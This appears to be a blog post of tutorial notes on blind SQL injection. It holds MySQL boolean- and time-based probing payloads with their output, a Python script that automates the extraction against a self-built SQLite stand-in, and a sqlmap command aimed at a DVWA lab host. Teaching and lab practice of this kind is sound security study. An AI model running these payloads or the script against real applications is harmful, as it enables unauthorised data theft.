SQL blind injection - notes

Blind injection is the situation where the result of the database query is never shown directly on the page. The only feedback channel is whether the constructed query makes the response behave as "true" or "false", and information is extracted one bit of truth at a time.
 
The injection technique itself differs little from echo-based (UNION/error) injection; only the relevant ideas are recorded below.
 
select length('test');   returns the length of a string (4 here)
Use binary search on length(database()) to find the length of the database name:
mysql> select length(database())>10;
+-----------------------+
| length(database())>10 |
+-----------------------+
|                     0 |
+-----------------------+
1 row in set (0.00 sec)
 
mysql> select length(database())>5;
+----------------------+
| length(database())>5 |
+----------------------+
|                    0 |
+----------------------+
1 row in set (0.00 sec)
 
mysql> select length(database())>3;
+----------------------+
| length(database())>3 |
+----------------------+
|                    1 |
+----------------------+
1 row in set (0.00 sec)
 
mysql> select length(database())=4;
+----------------------+
| length(database())=4 |
+----------------------+
|                    1 |
+----------------------+
1 row in set (0.00 sec)
 
mysql> select substr(database(),1,1);
+------------------------+
| substr(database(),1,1) |
+------------------------+
| d                      |
+------------------------+
1 row in set (0.00 sec)
 
mysql> select ascii(substr(database(),1,1))>64;
+----------------------------------+
| ascii(substr(database(),1,1))>64 |
+----------------------------------+
|                                1 |
+----------------------------------+
1 row in set (0.00 sec)
 
mysql> select ascii(substr(database(),1,1))>100;
+-----------------------------------+
| ascii(substr(database(),1,1))>100 |
+-----------------------------------+
|                                 0 |
+-----------------------------------+
1 row in set (0.00 sec)
 
mysql> select ascii(substr(database(),1,1))>80;
+----------------------------------+
| ascii(substr(database(),1,1))>80 |
+----------------------------------+
|                                1 |
+----------------------------------+
1 row in set (0.00 sec)
 
mysql> select ascii(substr(database(),1,1))>90;
+----------------------------------+
| ascii(substr(database(),1,1))>90 |
+----------------------------------+
|                                1 |
+----------------------------------+
1 row in set (0.00 sec)
 
mysql> select ascii(substr(database(),1,1))>95;
+----------------------------------+
| ascii(substr(database(),1,1))>95 |
+----------------------------------+
|                                1 |
+----------------------------------+
1 row in set (0.00 sec)
 
mysql> select ascii(substr(database(),1,1))>97;
+----------------------------------+
| ascii(substr(database(),1,1))>97 |
+----------------------------------+
|                                1 |
+----------------------------------+
1 row in set (0.00 sec)
 
mysql> select ascii(substr(database(),1,1))>98;
+----------------------------------+
| ascii(substr(database(),1,1))>98 |
+----------------------------------+
|                                1 |
+----------------------------------+
1 row in set (0.00 sec)
 
mysql> select ascii(substr(database(),1,1))>99;
+----------------------------------+
| ascii(substr(database(),1,1))>99 |
+----------------------------------+
|                                1 |
+----------------------------------+
1 row in set (0.00 sec)
 
mysql> select ascii(substr(database(),1,1))=100;
+-----------------------------------+
| ascii(substr(database(),1,1))=100 |
+-----------------------------------+
|                                 1 |
+-----------------------------------+
1 row in set (0.00 sec)
 
Narrowing the range this way gives an ASCII code of 100 for the first character of the database name, which is lowercase d. The steps above finish with a linear walk (>97, >98, >99); a strict binary search over the printable range 32-126 needs at most 7 queries per character, which is what automated tools do.
 
Blind injection can also work on a time delay (time-based): sleep() pauses for the given number of seconds, and wrapping the condition in if() makes the delay fire only when the guess is true.
mysql> select sleep(if(length(database())=4,3,0));
+-------------------------------------+
| sleep(if(length(database())=4,3,0)) |
+-------------------------------------+
|                                   0 |
+-------------------------------------+
1 row in set (3.00 sec)
 
mysql> select sleep(if(length(database())=5,3,0));
+-------------------------------------+
| sleep(if(length(database())=5,3,0)) |
+-------------------------------------+
|                                   0 |
+-------------------------------------+
1 row in set (0.00 sec)
 
The response time tells you whether the guess was right: the query took 3.00 sec when the length was 4 and returned immediately when it was 5. Note that inside a real WHERE clause MySQL evaluates sleep() once for every row it is applied to, so against a large table the delay multiplies; keep the condition on a query that matches a single row.
 
benchmark(), which executes an expression repeatedly, can also be used to produce a delay. The delay depends on server CPU and load rather than a fixed number of seconds, so it is less predictable than sleep():
mysql> select benchmark(50000,md5('test'));
 
+------------------------------+
| benchmark(50000,md5('test')) |
+------------------------------+
|                            0 |
+------------------------------+
1 row in set (0.02 sec)
 
mysql> select benchmark(5000000,md5('test'));
+--------------------------------+
| benchmark(5000000,md5('test')) |
+--------------------------------+
|                              0 |
+--------------------------------+
1 row in set (1.45 sec)
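The manual binary search above (boolean-based, against database()) and the sleep()-based variant are the same algorithm with a different oracle. The script below is an added example that is not part of the original post; it automates both. It assumes a SQLite in-memory database as a stand-in for the vulnerable application, with the secret stored in a constructed table `meta` instead of MySQL's database(), SQLite's unicode() standing in for ascii(), CASE WHEN standing in for if(), and a Python-registered sleep() UDF standing in for MySQL's SLEEP(). The table and function names are assumptions of this example only.

```python
import sqlite3
import time

# Constructed secret: plays the role of database() in the notes above.
SECRET = "dvwa"


def build_db():
    """Build the stand-in vulnerable database (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE meta (name TEXT)")
    conn.execute("INSERT INTO meta VALUES (?)", (SECRET,))
    conn.execute("CREATE TABLE users (id INTEGER, first TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin')")
    # SQLite has no SLEEP(); register one so time-based payloads behave like MySQL.
    conn.create_function("sleep", 1, lambda s: time.sleep(s) or 0)
    conn.commit()
    return conn


def vulnerable_query(conn, user_id):
    """The injection point: user input concatenated straight into the SQL."""
    sql = "SELECT first FROM users WHERE id = " + user_id
    return conn.execute(sql).fetchall()


def boolean_oracle(conn):
    """True/false is observed from whether the page shows a row or not."""
    def ask(cond):
        rows = vulnerable_query(conn, "1 AND (" + cond + ")")
        return len(rows) > 0
    return ask


def time_oracle(conn, delay=0.05):
    """True/false is observed from the response time only (no row needed).
    The payload mirrors sleep(if(cond,3,0)) from the notes; on one matching
    row the delay fires once, on N rows MySQL would fire it N times."""
    def ask(cond):
        payload = f"1 AND sleep(CASE WHEN ({cond}) THEN {delay} ELSE 0 END)"
        start = time.perf_counter()
        vulnerable_query(conn, payload)
        return time.perf_counter() - start >= delay / 2
    return ask


def binary_search(oracle, expr, lo, hi):
    """Recover the integer value of SQL expression `expr`, known to lie in
    [lo, hi], asking the oracle only questions of the form 'expr > n'."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"{expr} > {mid}"):
            lo = mid + 1      # value is at least mid + 1
        else:
            hi = mid          # value is at most mid
    return lo


def extract(oracle, target="(SELECT name FROM meta)", max_len=64):
    """Blind-extract a string: first its length, then each character by
    binary search over the printable ASCII range 32..126 (7 queries max)."""
    length = binary_search(oracle, f"length({target})", 0, max_len)
    chars = []
    for i in range(1, length + 1):
        # unicode() is SQLite's equivalent of MySQL's ascii()
        code = binary_search(oracle, f"unicode(substr({target},{i},1))", 32, 126)
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    db = build_db()
    print("boolean-based:", extract(boolean_oracle(db)))
    print("time-based:   ", extract(time_oracle(db)))
```

Swapping the oracle is the only change between the two techniques; against a real target the boolean oracle compares response bodies or status codes, and the time oracle should use a delay well above the server's normal latency jitter.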
 
 
DVWA, high difficulty:
python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli_blind/" -p "id" --cookie "PHPSESSID=dv9h9urfu9bf9udkd7ih6qdbj3;id=1;security=high" --level 2
The injectable parameter is carried in the cookie, so --level 2 is required (sqlmap only tests Cookie values at level 2 or above). --technique=BT restricts it to the boolean- and time-based techniques covered here.
 
 
 

posted on 2017-05-21 12:42 by 武诚治